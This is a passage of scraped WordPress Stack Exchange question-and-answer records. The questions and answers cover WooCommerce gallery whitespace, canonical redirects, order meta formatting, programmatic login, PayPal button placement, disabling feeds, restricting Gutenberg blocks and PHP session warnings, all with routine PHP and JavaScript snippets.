"author": "chewflow",
"author_id": 196586,
"author_profile": "https://wordpress.stackexchange.com/users/196586",
"pm_score": 2,
"selected": true,
"text": "<p>Ok, so eventually managed to figure out that it was due to a couple of optimization plugins that were interfering with WooCommerce's image slider: JetPack's lazy loading and SG Optimizer.</p>\n<p>Deactivated SG Optimizer and added the following to my child theme's functions.php:</p>\n<pre><code>function is_lazyload_activated()\n{\n $condition = is_product();\n if ($condition) {\n return false;\n }\n return true;\n}\nadd_filter('lazyload_is_enabled', 'is_lazyload_activated');\n</code></pre>\n<p>Now things are working again. Shame that can't have the optimization plugins working at the same time. At least the code above allows lazy loading on all pages except for the product pages though.</p>\n"
}
] | 2020/10/24 | [
"https://wordpress.stackexchange.com/questions/377083",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/196586/"
] | I'm trying to understand why whitespace appears between the main product image and the product gallery on this page: <http://etica.co.nz/product/mini-icosidodecahedron-ring-bearer-box/>
Clicking on the middle image will remove the whitespace.
Why would it be doing this?
Cheers | Ok, so eventually managed to figure out that it was due to a couple of optimization plugins that were interfering with WooCommerce's image slider: JetPack's lazy loading and SG Optimizer.
Deactivated SG Optimizer and added the following to my child theme's functions.php:
```
function is_lazyload_activated()
{
$condition = is_product();
if ($condition) {
return false;
}
return true;
}
add_filter('lazyload_is_enabled', 'is_lazyload_activated');
```
Now things are working again. Shame that can't have the optimization plugins working at the same time. At least the code above allows lazy loading on all pages except for the product pages though. |
377,143 | <p>I have a page like mysite.com/contacts/
If I enter non-existent urls like:</p>
<pre><code>mysite.com/contacts--/
mysite.com/contacts%20/
</code></pre>
<p>i get status 200 and the page opens mysite.com/contacts/
although if I enter:</p>
<pre><code>mysite.com/contacts1/
</code></pre>
<p>As expected, I am getting a 404 error.</p>
<p>How can I implement error handling at the CMS level so that non-existent pages return a page with a 404 error template? There may be some plugin that implements URL management?</p>
| [
{
"answer_id": 377145,
"author": "Tom J Nowell",
"author_id": 736,
"author_profile": "https://wordpress.stackexchange.com/users/736",
"pm_score": 3,
"selected": true,
"text": "<p><strong>That's not what's happening</strong>, when you visit <code>/contacts--/</code> it doesn't return a 200 code, but instead it returns a <code>301</code> redirect code. The browser then follows this redirect and heads to <code>/contact</code> and it's <code>/contact</code> that returns <code>200</code> code.</p>\n<p>This is because <code>/contact</code> is the canonical URL of that page, and WordPress redirects to canonical pages out of the box for improved SEO. It should also be adding a meta tag to the header containing the canonical URL to avoid duplicate content penalties.</p>\n"
},
{
"answer_id": 379923,
"author": "Yushko Aleksandr",
"author_id": 136775,
"author_profile": "https://wordpress.stackexchange.com/users/136775",
"pm_score": 0,
"selected": false,
"text": "<p>If you need to prevent WordPress from guessing URLs, you can add the following code to function.php</p>\n<pre><code>function remove_redirect_guess_404_permalink( $redirect_url ) {\n if ( is_404() ) {\n return false;\n } //end if\n return $redirect_url;\n} //end remove_redirect_guess_404_permalink()\nadd_filter( 'redirect_canonical', 'remove_redirect_guess_404_permalink' );\n</code></pre>\n<p><a href=\"https://neliosoftware.com/blog/devtips-how-to-stop-wordpress-from-guessing-urls/?nab=0\" rel=\"nofollow noreferrer\">Link to article</a></p>\n"
}
] | 2020/10/26 | [
"https://wordpress.stackexchange.com/questions/377143",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/136775/"
] | I have a page like mysite.com/contacts/
If I enter non-existent urls like:
```
mysite.com/contacts--/
mysite.com/contacts%20/
```
i get status 200 and the page opens mysite.com/contacts/
although if I enter:
```
mysite.com/contacts1/
```
As expected, I am getting a 404 error.
How can I implement error handling at the CMS level so that non-existent pages return a page with a 404 error template? There may be some plugin that implements URL management? | **That's not what's happening**, when you visit `/contacts--/` it doesn't return a 200 code, but instead it returns a `301` redirect code. The browser then follows this redirect and heads to `/contact` and it's `/contact` that returns `200` code.
This is because `/contact` is the canonical URL of that page, and WordPress redirects to canonical pages out of the box for improved SEO. It should also be adding a meta tag to the header containing the canonical URL to avoid duplicate content penalties. |
377,268 | <p>I'm trying to display every key and value from WooCommerce <code>get_formatted_meta_data</code> order meta details.
This is my code to generate the array:</p>
<pre><code>$order = new WC_Order( $order_id );
foreach ( $order->get_items() as $item_id => $item ) {
$item_data = $item->get_data();
$item_meta_data = $item->get_meta_data();
$formatted_meta_data = $item->get_formatted_meta_data( ' ', true );
$array = json_decode(json_encode($formatted_meta_data), true);
$arrayx = array_values($array);
foreach($arrayx as $value) {
$result[]=array($value["display_key"], wp_strip_all_tags($value["display_value"]));
foreach ($result as $key => $value) {
$var_label = $key;
$var_value = $value;
}
}
}
</code></pre>
<p>And this is the array I managed to print using above function:</p>
<pre><code>Array
(
[0] => Array
(
[0] => Color
[1] => Black
)
[1] => Array
(
[0] => Size
[1] => M
)
[2] => Array
(
[0] => Gift
[1] => Tes 2
)
)
</code></pre>
<p>Now I want to get each value in the array and want to display them like this (displayed in new line):</p>
<pre><code>Color: Black
Size: M
Gift: Tes 2
etc
etc
etc (dynamically inserted by WooCommerce if any or added by other plugins)
</code></pre>
<p>This is what I have already tried:</p>
<pre><code>$order = new WC_Order( $order_id );
foreach ( $order->get_items() as $item_id => $item ) {
$product_id = $item->get_product_id();
$quantity = $item->get_quantity();
$product_name = $item->get_name();
$item_data = $item->get_data();
$item_meta_data = $item->get_meta_data();
$formatted_meta_data = $item->get_formatted_meta_data( ' ', true );
$array = json_decode(json_encode($formatted_meta_data), true);
$arrayx = array_values($array);
$count=0;
foreach($arrayx as $value) {
$result[]=array($value["display_key"], wp_strip_all_tags($value["display_value"]));
foreach ($result as $key => $value) {
$var_label = $key;
$var_value = $value;
$metadata['count'] = "\r\n".$var_label[0].": ".$var_value[0]."";
$count++;
}
}
$formatted_product_name = wp_strip_all_tags(" *".$product_name."*");
$product_plus_meta = "*".$formatted_product_name."* ".$metadata['count']."";
$quantity = $item->get_quantity();
$output_content.= urlencode("".$quantity."x - ".$product_plus_meta."\r\n");
}
}
$output_content.="".$price."";
</code></pre>
<p>Using the above code, I could only fetch one value and key from the array (only the latest in the array) which is <code>Gift => Tes 2</code>.
And the output is something like this:</p>
<pre><code>1x - **Sample Product**
Gift: Tes 2
Price: $12.00
</code></pre>
<p>Instead of this:</p>
<pre><code>1x - **Sample Product**
Color: Black
Size: M
Gift: Tes 2
Price: $12.00
</code></pre>
<p>How to get the full list of each existed array key and value and display all of them in new line like above sample?</p>
<p>Thank you very much in advance.
Any help would be much appreciated.</p>
| [
{
"answer_id": 377282,
"author": "Djilan MOUHOUS",
"author_id": 196754,
"author_profile": "https://wordpress.stackexchange.com/users/196754",
"pm_score": 1,
"selected": false,
"text": "<p>if you can print your array why cant' you just do a loop on this array and adding each line into your output_content.\nIt will look like this</p>\n<pre><code><?php\n$myArray = Array\n(\n 0 => Array\n (\n 0 => "Color",\n 1 => "Black",\n ),\n\n 1 => Array\n (\n 0 => "Size",\n 1 => "M",\n ),\n\n 2 => Array\n (\n 0 => "Gift",\n 1 => "Tes 2"\n ),\n\n);\n$output_content = "";\nforeach($myArray as $key){\n $output_content .= $key[0]." : ".$key[1]."\\r";\n}\necho $output_content;\n\n?>\n</code></pre>\n<p>And this code prints :</p>\n<pre><code>Color : Black\nSize : M\nGift : Tes 2\n</code></pre>\n"
},
{
"answer_id": 377341,
"author": "Walter P.",
"author_id": 65317,
"author_profile": "https://wordpress.stackexchange.com/users/65317",
"pm_score": 0,
"selected": false,
"text": "<p>By using <a href=\"https://wordpress.stackexchange.com/users/196754/djilan-mouhous\">@Djilan</a>'s answer, I managed to fetch the data accordingly and tweak how it will be displayed, preventing compounded array in the next item.</p>\n<p>I missed this part (answered by <a href=\"https://wordpress.stackexchange.com/users/196754/djilan-mouhous\">@Djilan</a>), and this is indeed the correct way:</p>\n<pre><code>$product_meta = "";\nforeach($myArray as $key){\n $product_meta .= $key[0]." : ".$key[1]."\\r";\n}\necho $product_meta ;\n</code></pre>\n<p>Just need to adjust the code, and this is the final code:</p>\n<pre><code>...\n...\n$order = new WC_Order( $order_id );\nforeach ( $order->get_items() as $item_id => $item ) {\n $product_id = $item->get_product_id(); //Get the product ID\n $quantity = $item->get_quantity(); //Get the product QTY\n $product_name = $item->get_name(); //Get the product NAME\n $quantity = $item->get_quantity();\n $output_content .= urlencode("".$quantity."x - *".$product_name."*\\r\\n");\n // get order item data\n $item_data = $item->get_data();\n\n // get order item meta data\n $item_meta_data = $item->get_meta_data();\n\n // get only All item meta data\n $formatted_meta_data = $item->get_formatted_meta_data( '_', true );\n $array = json_decode(json_encode($formatted_meta_data), true);\n $arrayx = array_values($array);\n $arrayxxx = array_merge($array);\n $result = array();\n foreach( (array) $arrayxxx as $value) {\n $product_meta = "";\n $result[]=array($value["display_key"], wp_strip_all_tags($value["display_value"]));\n foreach ($result as $key) {\n $result = array();\n $product_meta .= " - ".$key[0].": ".$key[1]."\\r\\n";\n $output_content.= urlencode("".$product_meta."");\n }\n }\n}\n$output_content.="".$format_subtotal_price."";\necho $output_content;\n</code></pre>\n<p>And the final output would be something like this:</p>\n<pre><code>1x - Sample Product #1 - Black, M\n - Color: Black\n - Size: M\n1x - Sample Product #2\n - Color: Blue\n - Size: XL\n - Gift: Tes 3\n$1,173.00\n</code></pre>\n"
}
] | 2020/10/28 | [
"https://wordpress.stackexchange.com/questions/377268",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/65317/"
] | I'm trying to display every key and value from WooCommerce `get_formatted_meta_data` order meta details.
This is my code to generate the array:
```
$order = new WC_Order( $order_id );
foreach ( $order->get_items() as $item_id => $item ) {
$item_data = $item->get_data();
$item_meta_data = $item->get_meta_data();
$formatted_meta_data = $item->get_formatted_meta_data( ' ', true );
$array = json_decode(json_encode($formatted_meta_data), true);
$arrayx = array_values($array);
foreach($arrayx as $value) {
$result[]=array($value["display_key"], wp_strip_all_tags($value["display_value"]));
foreach ($result as $key => $value) {
$var_label = $key;
$var_value = $value;
}
}
}
```
And this is the array I managed to print using above function:
```
Array
(
[0] => Array
(
[0] => Color
[1] => Black
)
[1] => Array
(
[0] => Size
[1] => M
)
[2] => Array
(
[0] => Gift
[1] => Tes 2
)
)
```
Now I want to get each value in the array and want to display them like this (displayed in new line):
```
Color: Black
Size: M
Gift: Tes 2
etc
etc
etc (dynamically inserted by WooCommerce if any or added by other plugins)
```
This is what I have already tried:
```
$order = new WC_Order( $order_id );
foreach ( $order->get_items() as $item_id => $item ) {
$product_id = $item->get_product_id();
$quantity = $item->get_quantity();
$product_name = $item->get_name();
$item_data = $item->get_data();
$item_meta_data = $item->get_meta_data();
$formatted_meta_data = $item->get_formatted_meta_data( ' ', true );
$array = json_decode(json_encode($formatted_meta_data), true);
$arrayx = array_values($array);
$count=0;
foreach($arrayx as $value) {
$result[]=array($value["display_key"], wp_strip_all_tags($value["display_value"]));
foreach ($result as $key => $value) {
$var_label = $key;
$var_value = $value;
$metadata['count'] = "\r\n".$var_label[0].": ".$var_value[0]."";
$count++;
}
}
$formatted_product_name = wp_strip_all_tags(" *".$product_name."*");
$product_plus_meta = "*".$formatted_product_name."* ".$metadata['count']."";
$quantity = $item->get_quantity();
$output_content.= urlencode("".$quantity."x - ".$product_plus_meta."\r\n");
}
}
$output_content.="".$price."";
```
Using the above code, I could only fetch one value and key from the array (only the latest in the array) which is `Gift => Tes 2`.
And the output is something like this:
```
1x - **Sample Product**
Gift: Tes 2
Price: $12.00
```
Instead of this:
```
1x - **Sample Product**
Color: Black
Size: M
Gift: Tes 2
Price: $12.00
```
How to get the full list of each existed array key and value and display all of them in new line like above sample?
Thank you very much in advance.
Any help would be much appreciated. | if you can print your array why cant' you just do a loop on this array and adding each line into your output\_content.
It will look like this
```
<?php
$myArray = Array
(
0 => Array
(
0 => "Color",
1 => "Black",
),
1 => Array
(
0 => "Size",
1 => "M",
),
2 => Array
(
0 => "Gift",
1 => "Tes 2"
),
);
$output_content = "";
foreach($myArray as $key){
$output_content .= $key[0]." : ".$key[1]."\r";
}
echo $output_content;
?>
```
And this code prints :
```
Color : Black
Size : M
Gift : Tes 2
``` |
377,289 | <p>In my plugin I try to login a user and redirect them to a specific page, but when I redirect the user, they are not logged in :-/</p>
<p>I have tried multiple variations of code that looks like this:</p>
<pre><code>$wp_user = get_user_by( 'email', '[email protected]');
wp_clear_auth_cookie();
do_action('wp_login', $wp_user->user_login, $wp_user);
wp_set_current_user($wp_user->ID);
wp_set_auth_cookie($wp_user->ID, true);
$redirect_to = '/' . $redirectUrl;
if ( wp_safe_redirect($redirect_to ) ) {
exit;
}
</code></pre>
<p>How can I programmatically login the user and redirect them to a specific page?</p>
| [
{
"answer_id": 377282,
"author": "Djilan MOUHOUS",
"author_id": 196754,
"author_profile": "https://wordpress.stackexchange.com/users/196754",
"pm_score": 1,
"selected": false,
"text": "<p>if you can print your array why cant' you just do a loop on this array and adding each line into your output_content.\nIt will look like this</p>\n<pre><code><?php\n$myArray = Array\n(\n 0 => Array\n (\n 0 => "Color",\n 1 => "Black",\n ),\n\n 1 => Array\n (\n 0 => "Size",\n 1 => "M",\n ),\n\n 2 => Array\n (\n 0 => "Gift",\n 1 => "Tes 2"\n ),\n\n);\n$output_content = "";\nforeach($myArray as $key){\n $output_content .= $key[0]." : ".$key[1]."\\r";\n}\necho $output_content;\n\n?>\n</code></pre>\n<p>And this code prints :</p>\n<pre><code>Color : Black\nSize : M\nGift : Tes 2\n</code></pre>\n"
},
{
"answer_id": 377341,
"author": "Walter P.",
"author_id": 65317,
"author_profile": "https://wordpress.stackexchange.com/users/65317",
"pm_score": 0,
"selected": false,
"text": "<p>By using <a href=\"https://wordpress.stackexchange.com/users/196754/djilan-mouhous\">@Djilan</a>'s answer, I managed to fetch the data accordingly and tweak how it will be displayed, preventing compounded array in the next item.</p>\n<p>I missed this part (answered by <a href=\"https://wordpress.stackexchange.com/users/196754/djilan-mouhous\">@Djilan</a>), and this is indeed the correct way:</p>\n<pre><code>$product_meta = "";\nforeach($myArray as $key){\n $product_meta .= $key[0]." : ".$key[1]."\\r";\n}\necho $product_meta ;\n</code></pre>\n<p>Just need to adjust the code, and this is the final code:</p>\n<pre><code>...\n...\n$order = new WC_Order( $order_id );\nforeach ( $order->get_items() as $item_id => $item ) {\n $product_id = $item->get_product_id(); //Get the product ID\n $quantity = $item->get_quantity(); //Get the product QTY\n $product_name = $item->get_name(); //Get the product NAME\n $quantity = $item->get_quantity();\n $output_content .= urlencode("".$quantity."x - *".$product_name."*\\r\\n");\n // get order item data\n $item_data = $item->get_data();\n\n // get order item meta data\n $item_meta_data = $item->get_meta_data();\n\n // get only All item meta data\n $formatted_meta_data = $item->get_formatted_meta_data( '_', true );\n $array = json_decode(json_encode($formatted_meta_data), true);\n $arrayx = array_values($array);\n $arrayxxx = array_merge($array);\n $result = array();\n foreach( (array) $arrayxxx as $value) {\n $product_meta = "";\n $result[]=array($value["display_key"], wp_strip_all_tags($value["display_value"]));\n foreach ($result as $key) {\n $result = array();\n $product_meta .= " - ".$key[0].": ".$key[1]."\\r\\n";\n $output_content.= urlencode("".$product_meta."");\n }\n }\n}\n$output_content.="".$format_subtotal_price."";\necho $output_content;\n</code></pre>\n<p>And the final output would be something like this:</p>\n<pre><code>1x - Sample Product #1 - Black, M\n - Color: Black\n - Size: M\n1x - Sample Product #2\n - Color: Blue\n - Size: XL\n - Gift: Tes 3\n$1,173.00\n</code></pre>\n"
}
] | 2020/10/28 | [
"https://wordpress.stackexchange.com/questions/377289",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/153529/"
] | In my plugin I try to login a user and redirect them to a specific page, but when I redirect the user, they are not logged in :-/
I have tried multiple variations of code that looks like this:
```
$wp_user = get_user_by( 'email', '[email protected]');
wp_clear_auth_cookie();
do_action('wp_login', $wp_user->user_login, $wp_user);
wp_set_current_user($wp_user->ID);
wp_set_auth_cookie($wp_user->ID, true);
$redirect_to = '/' . $redirectUrl;
if ( wp_safe_redirect($redirect_to ) ) {
exit;
}
```
How can I programmatically login the user and redirect them to a specific page? | if you can print your array why cant' you just do a loop on this array and adding each line into your output\_content.
It will look like this
```
<?php
$myArray = Array
(
0 => Array
(
0 => "Color",
1 => "Black",
),
1 => Array
(
0 => "Size",
1 => "M",
),
2 => Array
(
0 => "Gift",
1 => "Tes 2"
),
);
$output_content = "";
foreach($myArray as $key){
$output_content .= $key[0]." : ".$key[1]."\r";
}
echo $output_content;
?>
```
And this code prints :
```
Color : Black
Size : M
Gift : Tes 2
``` |
377,340 | <p>Is it possible to move paypal checkout button to another place on the screen?</p>
<p><a href="https://i.stack.imgur.com/xjiVJ.png" rel="nofollow noreferrer"><img src="https://i.stack.imgur.com/xjiVJ.png" alt="enter image description here" /></a></p>
<p>Right now the paypal button is on regular gateway form, I would like to move it to <code>woocommerce_checkout_before_customer_details</code> action.</p>
<p>I was at first using the filter below, but it refers only to placing order button and not paypal button.</p>
<pre><code><?php
echo apply_filters( 'woocommerce_order_button_html', '<button type="submit" class="button alt" name="woocommerce_checkout_place_order" id="place_order" >test</button>' ); // @codingStandardsIgnoreLine
?>
</code></pre>
<p>How to relocate paypal button gateway on checkout page in woocommerce?</p>
| [
{
"answer_id": 377343,
"author": "Walter P.",
"author_id": 65317,
"author_profile": "https://wordpress.stackexchange.com/users/65317",
"pm_score": 2,
"selected": true,
"text": "<p>Have you tried this?</p>\n<p>E.g. the paypal button function name is <code>woo_custom_paypal_button</code>.</p>\n<p>Then add action like this into your <code>function.php</code> or specific plugin:</p>\n<pre><code>add_action( 'woocommerce_checkout_before_customer_details', 'woo_custom_paypal_button' );\n</code></pre>\n<p>Or if there's something that's already displayed there, and you might want to remove it, first find the function name and then try like this:</p>\n<pre><code>remove_action( 'woocommerce_checkout_before_customer_details', 'woo_function_to_remove' );\nadd_action( 'woocommerce_checkout_before_customer_details', 'woo_custom_paypal_button');\n</code></pre>\n<p><strong>Update</strong></p>\n<p>I tried this code and worked in my case:</p>\n<pre><code>add_action( 'wp_loaded', 'x_relocate_paypal_button' );\nfunction x_relocate_paypal_button() {\n $cls = new WC_Gateway_PPEC_With_SPB;\n add_action( 'woocommerce_checkout_before_customer_details', array( $cls, 'display_paypal_button' ), 20 );\n}\n</code></pre>\n<p>Just replace the <code>woocommerce_checkout_before_customer_details</code> hook to relocate to another position.\nYou can find more visual hook guide on checkout page on <a href=\"https://www.businessbloomer.com/woocommerce-visual-hook-guide-checkout-page/\" rel=\"nofollow noreferrer\">this article</a>.</p>\n"
},
{
"answer_id": 404259,
"author": "lee03",
"author_id": 169273,
"author_profile": "https://wordpress.stackexchange.com/users/169273",
"pm_score": 0,
"selected": false,
"text": "<p>This worked for me and moved the button into the review order div:</p>\n<pre><code> add_filter('woocommerce_paypal_payments_checkout_button_renderer_hook', function() {\n return 'woocommerce_review_order_after_submit';\n});\n</code></pre>\n<p><a href=\"https://github.com/woocommerce/woocommerce-paypal-payments/wiki/Actions-and-Filters#change-button-placement-via-render-hooks\" rel=\"nofollow noreferrer\">https://github.com/woocommerce/woocommerce-paypal-payments/wiki/Actions-and-Filters#change-button-placement-via-render-hooks</a></p>\n<p><a href=\"https://www.businessbloomer.com/woocommerce-visual-hook-guide-checkout-page/\" rel=\"nofollow noreferrer\">https://www.businessbloomer.com/woocommerce-visual-hook-guide-checkout-page/</a></p>\n"
}
] | 2020/10/29 | [
"https://wordpress.stackexchange.com/questions/377340",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/191084/"
] | Is it possible to move paypal checkout button to another place on the screen?
[](https://i.stack.imgur.com/xjiVJ.png)
Right now the paypal button is on regular gateway form, I would like to move it to `woocommerce_checkout_before_customer_details` action.
I was at first using the filter below, but it refers only to placing order button and not paypal button.
```
<?php
echo apply_filters( 'woocommerce_order_button_html', '<button type="submit" class="button alt" name="woocommerce_checkout_place_order" id="place_order" >test</button>' ); // @codingStandardsIgnoreLine
?>
```
How to relocate paypal button gateway on checkout page in woocommerce? | Have you tried this?
E.g. the paypal button function name is `woo_custom_paypal_button`.
Then add action like this into your `function.php` or specific plugin:
```
add_action( 'woocommerce_checkout_before_customer_details', 'woo_custom_paypal_button' );
```
Or if there's something that's already displayed there, and you might want to remove it, first find the function name and then try like this:
```
remove_action( 'woocommerce_checkout_before_customer_details', 'woo_function_to_remove' );
add_action( 'woocommerce_checkout_before_customer_details', 'woo_custom_paypal_button');
```
**Update**
I tried this code and worked in my case:
```
add_action( 'wp_loaded', 'x_relocate_paypal_button' );
function x_relocate_paypal_button() {
$cls = new WC_Gateway_PPEC_With_SPB;
add_action( 'woocommerce_checkout_before_customer_details', array( $cls, 'display_paypal_button' ), 20 );
}
```
Just replace the `woocommerce_checkout_before_customer_details` hook to relocate to another position.
You can find more visual hook guide on checkout page on [this article](https://www.businessbloomer.com/woocommerce-visual-hook-guide-checkout-page/). |
377,379 | <p>I'd like to completely disable RSS feeds on my WP website. Can someone please guide me on how to throw a 404.php page and set the headers to 404, when someone types in <code>https://example.com/feed/</code></p>
<p>here is the code in functions.php:</p>
<pre><code>function disable_feeds() {
global $wp_query;
$wp_query->is_feed = false;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
wp_die( __('No feed available,please visit our <a href="'. get_bloginfo('url') .'">homepage</a>!') );
}
add_action( 'do_feed', 'disable_feeds', 1 );
add_action( 'do_feed_rdf', 'disable_feeds', 1 );
add_action( 'do_feed_rss', 'disable_feeds', 1 );
add_action( 'do_feed_rss2', 'disable_feeds', 1 );
add_action( 'do_feed_atom', 'disable_feeds', 1 );
add_action( 'do_feed_rss2_comments', 'disable_feeds', 1 );
add_action( 'do_feed_atom_comments', 'disable_feeds', 1 );
add_action( 'feed_links_show_posts_feed', '__return_false', 1 );
add_action( 'feed_links_show_comments_feed', '__return_false', 1 );
</code></pre>
<p>Strangely, I get a 500 Internal Server Error when typing <code>https://example.com/feed/</code></p>
<p>no corresponding rules are set in <code>.htaccess</code> file
Thanks in advance.</p>
| [
{
"answer_id": 377395,
"author": "chris_blues",
"author_id": 196810,
"author_profile": "https://wordpress.stackexchange.com/users/196810",
"pm_score": 1,
"selected": false,
"text": "<p>If I want to bail out of my WP, I do it like this:</p>\n<pre><code> $wp_query->set_404();\n status_header( 404 );\n get_template_part( 404 );\n exit();\n</code></pre>\n<p>I'm actually not sure, why you get a 500 error. I'd try to comment out the lines of your function one-by-one and see, where the error occurs.</p>\n"
},
{
"answer_id": 381501,
"author": "sanjay ojha",
"author_id": 109152,
"author_profile": "https://wordpress.stackexchange.com/users/109152",
"pm_score": 2,
"selected": false,
"text": "<p>You need to define the HTTP Response code in <code>wp_die</code> function.</p>\n<pre class=\"lang-php prettyprint-override\"><code>wp_die( __('No feed available,please visit our <a href="'. get_bloginfo('url') .'">homepage</a>!'), '', 404 );\n</code></pre>\n"
}
] | 2020/10/30 | [
"https://wordpress.stackexchange.com/questions/377379",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/196827/"
] | I'd like to completely disable RSS feeds on my WP website. Can someone please guide me on how to throw a 404.php page and set the headers to 404, when someone types in `https://example.com/feed/`
here is the code in functions.php:
```
function disable_feeds() {
global $wp_query;
$wp_query->is_feed = false;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
wp_die( __('No feed available,please visit our <a href="'. get_bloginfo('url') .'">homepage</a>!') );
}
add_action( 'do_feed', 'disable_feeds', 1 );
add_action( 'do_feed_rdf', 'disable_feeds', 1 );
add_action( 'do_feed_rss', 'disable_feeds', 1 );
add_action( 'do_feed_rss2', 'disable_feeds', 1 );
add_action( 'do_feed_atom', 'disable_feeds', 1 );
add_action( 'do_feed_rss2_comments', 'disable_feeds', 1 );
add_action( 'do_feed_atom_comments', 'disable_feeds', 1 );
add_action( 'feed_links_show_posts_feed', '__return_false', 1 );
add_action( 'feed_links_show_comments_feed', '__return_false', 1 );
```
Strangely, I get a 500 Internal Server Error when typing `https://example.com/feed/`
no corresponding rules are set in `.htaccess` file
Thanks in advance. | You need to define the HTTP Response code in `wp_die` function.
```php
wp_die( __('No feed available,please visit our <a href="'. get_bloginfo('url') .'">homepage</a>!'), '', 404 );
``` |
377,382 | <p>By adding a new post, we have access to all core blocks from the very beginning. I would like to limit this and prevent some core blocks from being used on the main level. They should only be available inside my custom inner block.</p>
<p>I have been given some advice about:</p>
<ul>
<li>using the <code>template</code> with <code>init</code> action</li>
<li>using the <code>parent</code> attribute in custom block</li>
</ul>
<p>but all this does not limit the availability of blocks at the main level</p>
<p>I figured maybe hiding blocks, depending on where the inserter is in the <code>DOM</code> structure might be an idea but I'm not sure it's a good direction.</p>
| [
{
"answer_id": 377394,
"author": "Towhidul Islam",
"author_id": 196377,
"author_profile": "https://wordpress.stackexchange.com/users/196377",
"pm_score": 0,
"selected": false,
"text": "<p>If I understand your post correctly, I believe you are looking for <code>ALLOWED_BLOCKS </code> property. Use this in your Inner-blocks in following.</p>\n<pre><code>const ALLOWED_BLOCKS = [ 'core/image', 'core/paragraph' ];\n<InnerBlocks\n allowedBlocks={ ALLOWED_BLOCKS }\n/>\n</code></pre>\n<p>You can find more info here <a href=\"https://developer.wordpress.org/block-editor/tutorials/block-tutorial/nested-blocks-inner-blocks/#allowed-blocks\" rel=\"nofollow noreferrer\">https://developer.wordpress.org/block-editor/tutorials/block-tutorial/nested-blocks-inner-blocks/#allowed-blocks</a></p>\n"
},
{
"answer_id": 377621,
"author": "Welcher",
"author_id": 27210,
"author_profile": "https://wordpress.stackexchange.com/users/27210",
"pm_score": 1,
"selected": false,
"text": "<p>You will need to filter the template for the post type:</p>\n<pre><code>add_action( 'init', 'setup_template' );\n\nfunction setup_template() {\n $post_object = get_post_type_object( 'post' );\n $post_object->template = [ [ 'your/custom/block' ] ];\n $post_object->template_lock = 'all';\n}\n</code></pre>\n<p>This will pre-populate the post with a single instance of your custom block and lock it from being changed.</p>\n<p>By locking it, they cannot insert any top-level blocks but can still insert items into your custom block. There is more <a href=\"https://developer.wordpress.org/block-editor/developers/block-api/block-templates/#locking\" rel=\"nofollow noreferrer\">info in the docs</a> about locking, you may need <code>insert</code> instead of <code>all</code> depending on your intent.</p>\n<p>Hope it helps.</p>\n"
},
{
"answer_id": 411206,
"author": "jennsuzhoy",
"author_id": 138053,
"author_profile": "https://wordpress.stackexchange.com/users/138053",
"pm_score": 0,
"selected": false,
"text": "<p>Adding to <a href=\"https://wordpress.stackexchange.com/a/377621/138053\">@Welcher's answer</a>, because it got me about 85% percent of the way there.</p>\n<p>There are a few steps that it took to get this to work:</p>\n<ol>\n<li>Write the template and lock it (as the original answer indicated)</li>\n<li>Create an allowedBlocks list and apply it to your InnerBlocks component in the render callback function or template</li>\n<li>Unlock the InnerBlocks component so the blocks on your allow list can be added/moved/etc.</li>\n</ol>\n<h2>In functions.php:</h2>\n<p><em>modified from original answer to show correct variables</em></p>\n<pre><code>add_action( 'init', 'setup_template' );\n\nfunction setup_template() {\n $post_type_object = get_post_type_object( 'post' );\n $post_type_object->template = [ [ 'your/custom/block' ] ];\n $post_type_object->template_lock = 'all';\n}\n</code></pre>\n<h2>In your render.php or callback function</h2>\n<pre><code><?php echo '<InnerBlocks allowedBlocks="' . esc_attr( wp_json_encode( $array_variable_of_blocks ) ) . " templateLock="false" />\n</code></pre>\n<p>Remember to set up your <code>$array_variable_of_blocks</code> with an array of which blocks should be allowed inside the InnerBlocks component. This can be done at the top of the file, or set globally in functions.php and declared at the top of the file.</p>\n"
}
] | 2020/10/30 | [
"https://wordpress.stackexchange.com/questions/377382",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/133615/"
] | By adding a new post, we have access to all core blocks from the very beginning. I would like to limit this and prevent some core blocks from being used on the main level. They should only be available inside my custom inner block.
I have been given some advice about:
* using the `template` with `init` action
* using the `parent` attribute in custom block
but all this does not limit the availability of blocks at the main level
I figured maybe hiding blocks, depending on where the inserter is in the `DOM` structure might be an idea but I'm not sure it's a good direction. | You will need to filter the template for the post type:
```
add_action( 'init', 'setup_template' );
function setup_template() {
$post_object = get_post_type_object( 'post' );
$post_object->template = [ [ 'your/custom/block' ] ];
$post_object->template_lock = 'all';
}
```
This will pre-populate the post with a single instance of your custom block and lock it from being changed.
By locking it, they cannot insert any top-level blocks but can still insert items into your custom block. There is more [info in the docs](https://developer.wordpress.org/block-editor/developers/block-api/block-templates/#locking) about locking, you may need `insert` instead of `all` depending on your intent.
Hope it helps. |
377,483 | <p>I'm new in WordPress development and I just created my first theme.</p>
<p>In my wp-admin, the <code>"Site Health"</code> tells me that a PHP session has been detected (critical error), here is the message :</p>
<blockquote>
<p>A PHP session was created by a session_start() function call. This
interferes with REST API and loopback requests. The session should be
closed by session_write_close() before making any HTTP requests.</p>
</blockquote>
<p>I need PHP's <code>$_SESSION</code> for a theme script, and I added this to my functions.php file for sessions to be properly initialized:</p>
<pre><code><?php
if (!session_id()) {
session_start();
}
</code></pre>
<p>If I delete these lines, the message disappears, but my PHP sessions don’t work anymore.</p>
<p>If I keep these lines, everything seems to be working properly but this message is worrying...</p>
<p>Does anyone have an idea to solve this problem while keeping the ability to use the <code>$_SESSION</code>?</p>
<p>My WP version is <code>5.5.3</code> and the PHP version is <code>7.4.8</code>.</p>
<p>Thank you in advance for your help!</p>
| [
{
"answer_id": 380509,
"author": "Francesco Mantovani",
"author_id": 157101,
"author_profile": "https://wordpress.stackexchange.com/users/157101",
"pm_score": 0,
"selected": false,
